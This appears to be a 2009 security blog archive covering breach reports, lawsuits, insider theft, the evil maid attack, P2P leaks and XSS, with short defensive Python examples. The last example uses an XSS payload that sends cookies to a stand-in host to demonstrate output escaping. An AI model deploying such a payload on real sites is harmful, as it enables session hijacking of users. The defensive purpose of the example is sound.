28. December 2009 · Verizon Business 2009 DBIR Supplemental Report provides empirical guidance for unifying security and compliance priorities · Categories: Breaches, Compliance, Risk Management, Security Management, Theory vs. Practice

The Verizon Business security forensics group's recently released 2009 Data Breach Investigations Supplemental Report provides common ground between those in the enterprise who are compliance-oriented and those who are security-oriented. While in theory there should be no difference between these groups, in practice there is.

Table 8 on page 28 evaluates the breach data set by the types of data breached. Number one by far is Payment Card Data at 84%; second is Personal Information at 31%. (Obviously a single case in the data set can fall into multiple data categories.) These are exactly the data types that regulatory compliance standards like PCI DSS and breach disclosure laws like Massachusetts 201 CMR 17.00 focus on.

Therefore there is high value in using the report's "threat action types" analysis to prioritize risk reduction as well as compliance programs, processes, and technologies.

While the original 2009 DBIR provided similar information in Figure 29 on page 33, it is the Supplemental Report that provides the threat action type analysis that can drive a common set of risk reduction and compliance priorities.

27. December 2009 · First Heartland suit dismissed – executives off the hook – for now · Categories: Breaches, Compliance, Legal

The first adjudicated lawsuit against the executives of Heartland Payment Systems went in favor of the defense.

As I am sure you are aware, Heartland Payment Systems is embroiled in countless lawsuits as a result of the disclosure it had to make in January 2009 of a breach of more than 130 million credit card numbers. It is considered the largest breach of credit card data in history.

A class action shareholder lawsuit filed against the executives of Heartland was dismissed earlier this month by Judge Anne Thompson of the U.S. District Court for the District of New Jersey on the basis that the executives' claim that they took security seriously was not a lie. Here is the actual opinion.

Gene Schultz weighed in with a thoughtful opinion here.

While I am no lawyer, it seems to me that this lawsuit was very narrowly focused, and based on my reading of the opinion, it is hard to see how the judge could have found for the plaintiff.

A lawsuit that would bring out the emails and memos associated with a variety of compliance and security decisions made by the Heartland executives would be more interesting.

24. November 2009 · Massive T-Mobile UK trade secret theft perpetrated by insider · Categories: Breaches, Data Loss Prevention, Trade Secrets Theft

Last week T-Mobile UK admitted to the theft of millions of customer records by one or more insiders. These customer records, which included contract expiration dates, were sold to T-Mobile competitors or third-party brokers, who "cold called" the T-Mobile customers when their contracts were about to expire in an attempt to get them to switch carriers.

While this is a privacy issue from the customer perspective, from T-Mobile's perspective it's also theft of trade secrets.

And this is about as basic as theft of trade secrets gets. According to the article in the Guardian, in the UK this type of crime is punishable only by a fine, not jail time, although the Information Commissioner's Office "is pushing for stronger powers to halt the unlawful trade in personal data…"

So if you steal a car, you can go to jail, but if you steal millions of customer records, you can't. Clearly the laws must be changed. Or perhaps, not being a lawyer, I am missing something.

Based on some research I've done, the same is true in the United States, i.e. no jail time. Here are some good links that cover trade secret law in the US:

Regardless of the laws and their need for change, organizations must invest in trade secret theft prevention appropriate to the associated level of risk.

Let's take a look at the components of Risk (Threat, Asset Value, Likelihood, and Economic Loss) in the context of trade secret theft.

The overall Threat is increasing as the specific methods of theft of digital Assets constantly evolve. Economic Loss, depending on the Value of the trade secret Asset, can range from significant to devastating, i.e., wiping out much or all of an organization's value.

It's hard to imagine that the Likelihood of theft of any trade secret in digital form could ever be rated as low. Unfortunately, we do not have well-accepted quantitative metrics for measuring the degree to which administrative and technical controls can reduce Likelihood.

Therefore trade secret theft risk mitigation is really a continuous process rather than a one-time effort. New threats are always appearing, and new administrative and technical controls must constantly be reviewed and, where appropriate, implemented to minimize the risk of trade secret theft.
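To make this concrete, here is a minimal sketch of a qualitative risk-scoring calculation for a trade secret. The 1-to-5 rating scale, the multiplicative model, and the function name are my own assumptions for illustration, not a standard formula.

```python
# Illustrative sketch only: a simple qualitative risk score for a trade secret.
# The 1-5 rating scale and the multiplicative model are assumptions for this example.

def trade_secret_risk(threat: int, asset_value: int, likelihood: int, economic_loss: int) -> float:
    """Combine the four risk components (each rated 1 = low to 5 = high) into a 0-1 score."""
    for name, rating in [("threat", threat), ("asset_value", asset_value),
                         ("likelihood", likelihood), ("economic_loss", economic_loss)]:
        if not 1 <= rating <= 5:
            raise ValueError(f"{name} must be rated 1 to 5, got {rating}")
    # Normalize the product of the ratings to a 0-1 scale (5**4 is the maximum product).
    return (threat * asset_value * likelihood * economic_loss) / 5 ** 4

# Example: evolving threat (4), high-value secret (5), likelihood hard to call low (4),
# potentially devastating economic loss (5).
print(f"Risk score: {trade_secret_risk(4, 5, 4, 5):.2f}")  # -> 0.64
```

Because the threat landscape and the available controls keep changing, a score like this is only meaningful if it is recalculated regularly, which is exactly why risk mitigation has to be continuous.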

26. October 2009 · Evil Maid attack shows that laptop hard drive encryption not the silver bullet · Categories: Breaches, Malware, Risk Management

As important as laptop hard drive encryption is, it's not a silver bullet for protecting confidential data on laptops. Bruce Schneier described Joanna Rutkowska's "evil maid" attack against a disk encryption product. This type of attack would probably work against any disk encryption product because disk encryption does not defend against an attacker who can tamper with the machine and capture your passphrase or encryption key.

As usual, risk management is about understanding the threat you are trying to mitigate. Disk encryption does solve the stolen laptop problem. But if an attacker can get access to your laptop multiple times without your realizing it, the evil maid attack can defeat disk encryption.

PGP, a disk encryption vendor, discusses the limitations of disk encryption as well as other defenses available to protect against evil maid and other attacks.

Bruce Schneier notes that two-factor authentication will defeat the evil maid attack. BTW, don't leave your token in the hotel room for the evil maid to find. 🙂
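Another partial defense, for the technically inclined, is to check that the unencrypted boot files have not been modified before you type your passphrase. Below is a minimal sketch of that idea; the /boot path, the baseline file location, and the approach itself are assumptions for illustration rather than a feature of any disk encryption product, and a firmware-level evil maid attack could still evade it.

```python
# Illustrative sketch: detect changes to the unencrypted boot partition, one possible
# indicator of evil-maid-style tampering. Paths and the baseline file are assumptions.
import hashlib
import json
import os
import sys

BOOT_DIR = "/boot"                                    # unencrypted files an attacker could modify
BASELINE = os.path.expanduser("~/boot_hashes.json")   # ideally kept on a separate USB key

def hash_boot_files(boot_dir: str = BOOT_DIR) -> dict:
    """Return {relative_path: sha256} for every readable file under boot_dir."""
    hashes = {}
    for root, _dirs, files in os.walk(boot_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as f:
                    hashes[os.path.relpath(path, boot_dir)] = hashlib.sha256(f.read()).hexdigest()
            except OSError:
                continue  # skip unreadable files
    return hashes

if __name__ == "__main__":
    current = hash_boot_files()
    if not os.path.exists(BASELINE):
        with open(BASELINE, "w") as f:
            json.dump(current, f, indent=2)
        print(f"Baseline written to {BASELINE}")
        sys.exit(0)
    with open(BASELINE) as f:
        baseline = json.load(f)
    changed = [p for p in current if baseline.get(p) != current[p]]
    missing = [p for p in baseline if p not in current]
    if changed or missing:
        print("WARNING: boot files changed or missing:", changed + missing)
    else:
        print("Boot files match the recorded baseline.")
```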

Wired Magazine reported this week that Wal-Mart kept secret a breach it discovered in November 2006 that had been ongoing for 17 months. According to the article, Wal-Mart claimed there was no reason to disclose the exploit at the time because it believed no customer data or credit card information was breached.

They are admitting that custom-developed point-of-sale software was breached. The California breach disclosure law covering breached financial information of California residents had gone into effect on July 1, 2003, and was extended to health information on January 1, 2009. I blogged about that here.

I think it would be more accurate to say that the forensics analysts hired by Wal-Mart could not "prove" that customer data was breached, i.e., could not find specific evidence that customer data was breached. One key piece of information the article revealed, "The company’s server logs recorded only unsuccessful log-in attempts, not successful ones, frustrating a detailed analysis."

Based on my background in log management, I understand the approach of collecting only "bad" events like failed log-ins. Other than that sentence, the article does not discuss what types of events were and were not collected. Either way, with only failed log-ins recorded, Wal-Mart had very little visibility into what was really going on.

The problem Wal-Mart faced at the time was that the cost of collecting and storing all of the logs in an accessible manner was prohibitive. Fortunately, log data management software has improved and hardware costs have dropped dramatically. In addition, there are new tools for user activity monitoring.
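To illustrate why successful log-ins matter as much as failed ones, here is a small sketch that tallies both from an authentication log. The log path and message format are assumptions modeled on a typical Linux sshd log, not on what Wal-Mart's point-of-sale servers actually recorded.

```python
# Illustrative sketch: count failed AND successful log-ins per account from an auth log.
# The log path and line format are assumptions (typical Linux sshd syntax).
import re
from collections import Counter

LOG_PATH = "/var/log/auth.log"  # assumed location; adjust for your environment

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+)")
ACCEPTED = re.compile(r"Accepted (?:password|publickey) for (\S+)")

def summarize(log_path: str = LOG_PATH):
    failures, successes = Counter(), Counter()
    with open(log_path, errors="replace") as f:
        for line in f:
            if (m := FAILED.search(line)):
                failures[m.group(1)] += 1
            elif (m := ACCEPTED.search(line)):
                successes[m.group(1)] += 1
    return failures, successes

if __name__ == "__main__":
    failures, successes = summarize()
    # An account with many failures followed by a success is exactly the pattern
    # you cannot see if only failed log-ins are collected.
    for user in failures:
        print(f"{user}: {failures[user]} failed, {successes.get(user, 0)} successful")
```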

However, my key reaction to this article is disappointment that Wal-Mart chose to keep this incident a secret. News of a Wal-Mart breach might have motivated other retailers to strengthen their security defenses and increase their vigilance, which might have reduced the number of breaches that have occurred since 2006. It might also have prompted QSAs to apply more rigor to PCI DSS audits sooner.

In closing, I would like to call attention to Adam Shostack and Andrew Stewart's book, "The New School of Information Security," and quote a passage from page 78 that talks about the value of disclosing breaches aside from the need to inform people whose personal financial or health information may have been breached:

"Breach data is bringing us more and better objective data than any past information-sharing initiative in the field of information security. Breach data allows us to see more about the state of computer security than we've been able to with traditional sources of information. … Crucially, breach data allows us to understand what sorts of issues lead to real problems, and this can help us all make better security decisions."

09. October 2009 · Cloud-based Data Leak Detection complements Data Leak Prevention – Monitoring P2P Networks · Categories: Breaches, Data Loss Prevention, IT Security 2.0, Privacy

Can you imagine your Data Leak Prevention system not being perfect? Is there value in a service that scans P2P networks looking for leaked data that eluded your Data Leak Prevention (DLP) controls?

Tiversa offers such a service. As an example of its value, the company claims, according to a Washington Post article, that "the personal data of tens of thousands of U.S. soldiers – including those in the Special Forces – continue to be downloaded to unauthorized computer users in countries such as China and Pakistan…"

On a separate but possibly related note, there was an Ars Technica article last week on a bill working its way through Congress called the "Informed P2P User Act." From the Ars Technica article:

"First, it requires P2P software vendors to provide "clear and
conspicuous" notice about the files being shared by the software and
then obtain user consent for sharing them. Second, it prohibits P2P
programs from being exceptionally sneaky; surreptitious installs are
forbidden, and the software cannot prevent users from removing it."

It's clear that P2P represents risks that can be reduced by both technical and legal means.
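As a toy illustration of the technical side, the sketch below scans a folder, say one exposed by a P2P client, for strings that look like U.S. Social Security numbers. The folder path and the single regular expression are assumptions for illustration; real DLP and leak detection services use far richer content fingerprinting.

```python
# Illustrative sketch: scan a shared folder for SSN-like patterns as a crude leak check.
# The folder path and pattern are assumptions; real DLP products use much richer detection.
import os
import re

SHARED_DIR = os.path.expanduser("~/Shared")         # assumed P2P shared folder
SSN_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")  # naive SSN-like pattern

def scan_shared_folder(shared_dir: str = SHARED_DIR):
    """Yield (path, match_count) for files containing SSN-like strings."""
    for root, _dirs, files in os.walk(shared_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as f:
                    hits = SSN_PATTERN.findall(f.read())
            except OSError:
                continue  # unreadable file; skip it
            if hits:
                yield path, len(hits)

if __name__ == "__main__":
    for path, count in scan_shared_folder():
        print(f"Possible leak: {path} ({count} SSN-like strings)")
```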


04. October 2009 · Canadian study reports breaches triple in 2009. Is this a valid statistic? · Categories: Breaches, Security Management

Earlier this week, Telus released the results of its 2009 study of Canadian IT security practices, conducted jointly with the Rotman School of Management at the University of Toronto, which claimed that the average number of breaches per organization tripled to 11.3. Here is the press release. But are these claims valid?

First, let's take a deeper look at the average of 11.3. By simply taking the raw answers to the 2009 question about the number of breaches during the last 12 months, the average, i.e. the mean, is indeed 11.3. However, let's take a closer look at the actual responses:

Number of Breaches    Percentage of Organizations
0                     14%
1                      6%
2 to 5                33%
6 to 10                9%
11 to 25               7%
26 to 50               3%
51 to 100              2%
More than 100          2%
Don't know            23%

Given the number of outliers, the average (mean) is not a very meaningful number; those outliers significantly skew it. The mode, 2 to 5 breaches, says much more about the typical organization.
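To see how much the tail drives the 11.3 figure, here is a small sketch that re-estimates the mean from the published bins using assumed midpoints (and an assumed value of 150 for "more than 100"), excluding the "don't know" responses. The midpoints are my assumptions, since the study publishes only ranges.

```python
# Illustrative sketch: re-estimate the survey's mean breach count from the published bins.
# The bin midpoints (and 150 for "more than 100") are my assumptions; the study gives only ranges.
bins = [
    # (assumed midpoint, share of organizations)
    (0,    0.14),   # 0 breaches
    (1,    0.06),   # 1
    (3.5,  0.33),   # 2 to 5
    (8,    0.09),   # 6 to 10
    (18,   0.07),   # 11 to 25
    (38,   0.03),   # 26 to 50
    (75.5, 0.02),   # 51 to 100
    (150,  0.02),   # more than 100 (assumed value)
]                   # "don't know" (23%) is excluded

def weighted_mean(data):
    total_weight = sum(w for _mid, w in data)
    return sum(mid * w for mid, w in data) / total_weight

print(f"Estimated mean, all respondents:        {weighted_mean(bins):.1f}")       # ~11.6
print(f"Estimated mean, top three bins removed: {weighted_mean(bins[:-3]):.1f}")  # ~4.6
```

Under these assumptions, roughly 7% of respondents (the top three bins) pull the estimated mean from under 5 up to over 11, which is exactly why the mode is the more representative statistic here.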

Also, there is no attempt to correlate the number of breaches an organization suffered with the organization's size. Of the 500 organizations participating, 31% had under 100 employees and 23% had over 10,000 employees. The point here is that the outliers may very well be a small group of very large organizations.

Now let's address the claim of "tripling." What could account for this huge increase?

  1. It may just be a case of people being more honest this year, i.e. reporting more breaches. After all, this is just a survey.
  2. It may be that organizations actually have better security controls in place and therefore detected more breaches.
  3. It may be a function of the organizations participating. In 2008, there were only 297 participants versus 500 in 2009.
  4. It could be the change in the way the question was worded in 2009 versus 2008. Here is the question from 2008 (in fact, the only place in the study that uses real numbers rather than percentages):

Q40. A major IT security incident can be defined as one which causes a disruption to normal activities such that significant time, resources, and/or payments are required to resolve the situation. Based on this definition, how many major security incidents do you estimate your organization has experienced in the last 12 months?

1 to 5          63%
6 to 10          2%
More than 10     1%
Don't know      24%

The 2009 study question:

Q48. How many Security breaches do you estimate your organization has experienced in the past 12 months?

I provided the responses earlier in this post. The point is that in 2008 the question specifically asked about major incidents, while in 2009 the question was about all breaches.

Also note that in both cases the organizations were asked for "estimates." Don't most of these organizations have Security Incident Response Teams? At least the 69% with over 100 full-time employees? Wouldn't they know exactly how many "incidents" they investigated and how many were actual breaches?

I suppose studies like these, based on surveys, have some value, but we really need information based on facts and analysis based on sound techniques.

04. October 2009 · URLZone – Funds Transfer Fraud innovation accelerates · Categories: Botnets, Breaches, Funds Transfer Fraud, Innovation, Malware

Web security firm Finjan published a report (Issue 2, 2009) this week on a more advanced funds transfer fraud trojan called URLZone. It basically follows the now well-understood process I blogged about previously, where:

  1. Cybercriminals infect Web sites using, for example, Cross Site Scripting.
  2. Web site visitors are infected with a trojan, in this case URLZone.
  3. The trojan is used to collect bank credentials.
  4. Cybercriminals transfer money from the victims to mules.
  5. The money is transferred from the mules to the cybercriminals.

URLZone is a more advanced trojan because of its level of automation of the funds transfer fraud (direct quotes from the Finjan report):

  • It hides its fraudulent transaction(s) in the report screen of the compromised account.
  • Its C&C [Command and Control] server sends instructions over HTTP about the amount to be stolen and where the stolen money should be deposited.
  • It logs and reports on other web accounts (e.g., Facebook, PayPal, Gmail) and banks from other countries.

In the past, such trojans were merely keyloggers that sent credentials back to the cybercriminals. Those exploits were mostly against small businesses and schools, where relatively large amounts of money could be stolen. But URLZone has much more sophisticated command and control, which enables a much higher volume of fraudulent transactions. Finjan reports 6,400 victims losing 300,000 euros in 22 days. So far all of the victims have been in Germany.

30. September 2009 · Twitter is dead · Categories: Application Security, Breaches

According to Robert X. Cringely, long-time computer industry pundit, Twitter is dead. Why?

"Twitter is dead because it is now so popular that the spammers and
the scammers have arrived in force. And history tells us that once they
sink their teeth into something, they do not let go. Ever.

Twitter scams aren't new. But I've never seen so many hit in a single week or with such rigorous precision."

Symantec has a nice blog post about one of the underlying problems with Twitter: because tweets are limited to 140 characters, people use "URL shorteners" instead of the actual URLs they are referring to. As a result, you have no idea where you are going when you click on a shortened URL.
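One simple mitigation is to expand a shortened URL and see where it actually points before visiting it. Here is a minimal sketch using only the Python standard library; the bit.ly link in the example is hypothetical.

```python
# Minimal sketch: reveal where a shortened URL actually points before visiting it.
# The example short URL is hypothetical; note that some shortening services may not accept HEAD.
import urllib.request

def expand_url(short_url: str, timeout: float = 10.0) -> str:
    """Follow redirects with a HEAD request and return the final destination URL."""
    req = urllib.request.Request(short_url, method="HEAD")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.geturl()  # URL after all redirects have been followed

if __name__ == "__main__":
    print(expand_url("https://bit.ly/example"))  # hypothetical shortened link
```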

Cringely closes with this:

Spam will kill Twitter's usefulness for everyone but relentless Internet marketers, unless the brainiacs at TwitCentral can figure out a better way to block it. Smart people have tried and failed everywhere else, though. I don't hold out much hope.

My view is that, just as with any new technology, if there are real benefits, people will tolerate the risks for some period of time and third parties will develop solutions to mitigate those risks. This is the history of the whole IT security industry.

Take email, for example. Email has been so valuable that people tolerated spam for some time. Then third parties developed anti-spam solutions, which enterprises were willing to pay for and consumers got as a feature of either their email client or their anti-malware product.

On the other hand, there is still a huge amount of email spam, which means that email spamming is still profitable. Therefore there are tons of people who either are not availing themselves of anti-spam filters or for some reason still fall for spam scams.

Yet with all that spam, there is no sign of email dying, due to its immense value.


30. September 2009 · Popular social news site infected with XSS exploit · Categories: Application Security, Breaches, Malware, Secure Browsing

The popular social news site Reddit was breached via an XSS exploit. Of course, the article does not indicate what protection methods, if any, Reddit was using to prevent this most popular of web site exploits. I wonder how Reddit would fare if an auditor showed up tomorrow using CSIS's Twenty Critical Cyber Security Controls (which I previously posted about) as a reference.
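For context, the baseline defense against this kind of stored XSS is to encode user-supplied content before rendering it into HTML. The snippet below is a generic illustration using Python's standard library; it is not a description of how Reddit's code works, and a real site would also rely on auto-escaping templates, input validation, and a Content Security Policy.

```python
# Generic illustration of output encoding, the baseline defense against stored XSS.
# This is not Reddit's code; it simply shows why escaping renders injected script inert.
import html

def render_comment(user_comment: str) -> str:
    """Return an HTML fragment with the user's comment safely escaped."""
    return f'<div class="comment">{html.escape(user_comment)}</div>'

# A script injected into a comment is displayed as text instead of executing:
print(render_comment('nice post <script>document.location="http://evil.example/"+document.cookie</script>'))
# -> <div class="comment">nice post &lt;script&gt;document.location=&quot;http://evil.example/&quot;+document.cookie&lt;/script&gt;</div>
```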